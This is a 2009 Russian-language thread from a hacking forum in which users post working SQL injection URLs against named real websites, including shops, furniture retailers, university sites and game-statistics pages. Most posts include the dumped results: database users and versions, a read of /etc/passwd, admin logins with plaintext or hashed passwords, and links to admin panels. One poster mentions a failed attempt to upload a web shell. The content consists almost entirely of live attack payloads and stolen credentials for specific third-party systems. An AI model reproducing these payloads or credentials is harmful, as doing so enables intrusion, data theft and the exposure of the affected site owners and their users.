ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.03.2009, 09:58
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
ПР5 ТИЦ 240
Код:
http://www.butik.ru/goods/view/gd480001'+union+select+1,2,3,4,concat(email,0x3a,pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+user+limit+5,1/*.html
|
|
|
28.03.2009, 10:30
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Все инъекции проверены на Антибоян, после чего добавлены в его базу!
Код:
http://gamingusa.org/vsp-core/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
gusa_gusa@localhost:gusa_vsp:5.0.67-community-log
Код:
http://stat-cod2.lline.net/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
wage@localhost:cod2-statistic:5.0.32-Debian_7etch8-log
Код:
http://quake3.scatplus.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
root@localhost:vsp:5.1.30
Код:
http://quake3.scatplus.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(CHAR(47,101,116,99,47,112,97,115,115,119,100)),2&config=cfg-default.php
/etc/passwd
file_priv=Y
Код:
http://www.sp33d.ws/ffa-instagib/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
q3stats@localhost:q3stats:5.0.32-Debian_7etch8-log
Код:
http://nest.deb.hu/stat_sie/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
stat@localhost:stat_sie:5.0.32-Debian_7etch1
Код:
http://www.clan-victory.co.uk/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
tilionor_clanvic@localhost:tilionor_clanvictory:5. 0.67-community-log |
|
|
|
28.03.2009, 12:28
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
Код:
http://www.dcd.ru/more.php?id=-10+union+select+1,concat_ws(0x3a,version(),database(),user())--
db : 5.0.51
name_db : db_dcd
user : dcd@localhost
http : //www.dcd.ru/admin
Код:
http://www.sokol-mebel.ru/details/index.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13--
db : 5.0.67-log
name_db : u97809
user: u97809@10.10.223.241
http://www.sokol-mebel.ru/admin
Последний раз редактировалось jokester; 28.03.2009 в 13:01..
Причина: Посты объединяй
|
|
|
|
28.03.2009, 14:41
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.univie.ac.at/unique/?tid=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a,name,pwd ),7,8,9,10,11,12,13,14,15,16,17+from+users+limit+0 ,1/*
PR8
https://www.univie.ac.at/ZID/cms/ <- админка
|
|
|
|
28.03.2009, 16:55
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
laguia.us
Вобщем все банально, скуль:
Код:
http://www.laguia.us/articulo.php?id=-1242+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11/*&edicion=93
revistalaguia@localhost:revistalaguia:5.0.45
т.к. мускул 5 смотрим с помощью INFORMATION_SCHEMA названия таблиц и полей
admuser-login,password
Код:
http://www.laguia.us/articulo.php?id=-1242+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,login,password),9,10,11+FROM+admusers/*&edicion=93
admin:2cad00b70163edcf: calvin79
админка
Код:
http://www.laguia.us/admin/
Залить шелл не удалось =\
|
|
|
|
28.03.2009, 17:07
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.filzmooserhof.at/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a3a ,benutzername_usr,passwort_usr),28,29,30,31,32+fro m+user_usr+limit+0,1--
http://www.filzmooserhof.at/cms/
реги рабочие
P.S. 2 _I7ad1a_ Если постишь sql инъекцию - пиши полностью а не тупую кавычку инче минусы будешь получать
|
|
|
|
28.03.2009, 18:12
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
<<Строительная база>>
Код:
http://www.stroi-baza.ru/articles/one.php?id=-551+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+200,1--
db : 5.0.45
name_db : stroibaza
user : u23827@90.156.210.182
log: Troitsa
pass: 54321
<<Сеть мебельных салонов уголок>>
Код:
http://www.ugol-ok.ru/model-mebel.php?id=10869&grm=-701+union+select+1,concat_ws(0x3a,version(),database(),user()),3--
db : 4.0.27-log
name_db : skynet
user : skynet@zvm2.host.ru
Последний раз редактировалось farex; 28.03.2009 в 18:33..
|
|
|
|
28.03.2009, 18:44
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
dcmp.bc.edu
pr:6
Код:
http://dcmp.bc.edu/news.php?id=8+AND+ascii(lower(substring(concat(user(),0x3a,version(),database()),2,1)))%3E1
Database Version: 3.23.53
Database name: dcmp
User name: root@localhost
water.grace.edu
Код:
http://water.grace.edu/news.php?id=-8+union+Select+1,2,3,4,concat(user,0x3a,password),6+from+mysql.user
Database Version: 4.1.22-community-nt
Database name: water
User name: lehman_group@localhost
marketing.pdx.edu
Код:
http://marketing.pdx.edu/news.php?id=63+AND+ascii(lower(substring(concat(user(),0x3a,version(),0x3a,database()),1,1)))%3E1
Database Version: 5.0.4
Database name: wwwpdxdb
User name: angell.bestla.oit.pdx.edu
|
|
|
|
28.03.2009, 18:57
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Вся база как на ладони
Код:
http://shop.e12.cz/index.php?page=katalog&model=287&level=3&parent=-135+union+select+1,2,3,4,5,6,concat_ws(0x2e,table_schema,table_name,column_name),8,9,10,11,12+from+information_schema.columns/*
|
|
|
|
28.03.2009, 19:57
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
<<Диваны тут>>
Код:
http://www.divan-tam.ru/transform.php?id=-4+union+select+1,2,3,concat_ws(0xa,user_email,user_pass,user_nick,user_name)+from+admin_users--
db : 5.1.24-rc-log
name_db : db28065m
user : m28065@fhe10.hoster.ru
table: admin_user
log: Crusader
pass: 123321
email: ed@divan-tut.ru |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
